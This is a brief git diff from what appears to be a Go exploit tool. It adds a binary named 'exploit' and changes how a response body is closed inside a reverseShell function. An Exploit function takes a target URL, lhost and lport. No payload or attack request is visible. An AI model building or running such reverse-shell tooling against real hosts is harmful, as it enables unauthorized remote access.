diff --git a/exploit b/exploit new file mode 100755 index 0000000..be317cc Binary files /dev/null and b/exploit differ diff --git a/internal/exploiter/exploiter.go b/internal/exploiter/exploiter.go index e101a2b..40d3ca4 100644 --- a/internal/exploiter/exploiter.go +++ b/internal/exploiter/exploiter.go @@ -106,7 +106,8 @@ func reverseShell(payload string, vulnUrl string, hostID int, dataIDs int) { fmt.Println("Error making request:", err) return } - defer resp.Body.Close() + + resp.Body.Close() } func Exploit(urlTarget string, lhost string, lport string) {